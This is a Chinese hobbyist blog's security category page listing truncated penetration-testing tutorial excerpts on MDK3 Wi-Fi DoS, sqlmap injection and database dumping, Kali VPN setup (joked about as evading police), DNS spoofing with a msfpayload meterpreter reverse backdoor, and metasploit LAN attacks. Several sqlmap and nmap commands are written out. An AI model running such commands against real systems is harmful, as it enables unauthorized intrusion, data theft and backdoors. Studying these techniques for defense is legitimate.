• 欢迎访问金笔头博客,这是一个菜鸟(伪)程序员的自留地,欢迎访问我的github:点击进入

信息安全

MDK3攻击模式详解

MDK3攻击模式详解
MDK3简介:MDK3 是一款集成在 BackTrack上的无线DOS攻击测试工具,能够发起Beacon Flood 、Authentication DoS、Deauthentication/Disassociation Amok等模式的攻击,另外它还具有针对隐藏 ESSID的暴力探测模式、802.1X 渗透测试、WIDS 干扰等功能,对于后面几种功能模……继续阅读 »

3年前 (2016-02-05) 4076浏览

Sql Injection and Dump The Data

Sql Injection and Dump The Data
1.检测注入点是否可用root@kali:~/Desktop# sqlmap -u http://www.xxoo.com/assist/index.php?id=20参数:-u:指定注入点url探测结果可知:(1)注入参数id为GET注入,注入类型为UNION query(2)web应用程序技术为PHP5.6.9(3)数据库类型为MyS……继续阅读 »

3年前 (2015-12-14) 1978浏览

sqlmap常用参数

sqlmap常用参数
#获取当前用户名称 sqlmap -u "http://url?id=1" --current-user #获取当前数据库名称sqlmap -u "http://url?id=1" --current-db #列出给定数据库的所有表sqlmap -u "http://url?id=1" -D "db_name" --tables #列出指定……继续阅读 »

3年前 (2015-12-13) 3286浏览

Kali Linux配置VPN(PPTP)

Kali Linux配置VPN(PPTP)
Kali Linux安装好之后默认是没有配置VPN连接的,有时候笔头君想干点儿坏事又不想暴露自己的位置以免被警察叔叔查水表,这时候配置VPN就显得很有必要了,好啦,下面开始配置过程。1.修改软件更新源root@kali:~#leafpad /etc/apt/sources.list2.将如下阿里云的Kali源粘贴进去,同时将官方源用#号注释掉d……继续阅读 »

3年前 (2015-11-14) 5900浏览

kali-Linux_DNS欺骗实现内网渗透

kali-Linux_DNS欺骗实现内网渗透
环境部署:kali-Linux + Windows XP SP3所需工具:Msf + ettercap + apache2目标主机:192.168.1.12攻击主机:192.168.1.71.首先用msfpayload 生成内个有效的WIN可执行后门root@kali:~# msfpayload windows/meterpreter/reve……继续阅读 »

3年前 (2015-09-05) 13561浏览

[BackTrack]漏洞利用之metasploit实战

[BackTrack]漏洞利用之metasploit实战
1.扫描局域网内存活主机,将扫描结果存入ip.txt中root@bt:~# nmap -sP 192.168.1.0/24 |grep ‘192.168.1.*’ >>/root/Desktop/ip.txtip.txt内容如下:整理一下格式:2.扫描存活主机的操作系统root@bt:~# nmap -O -……继续阅读 »

3年前 (2015-09-05) 16446浏览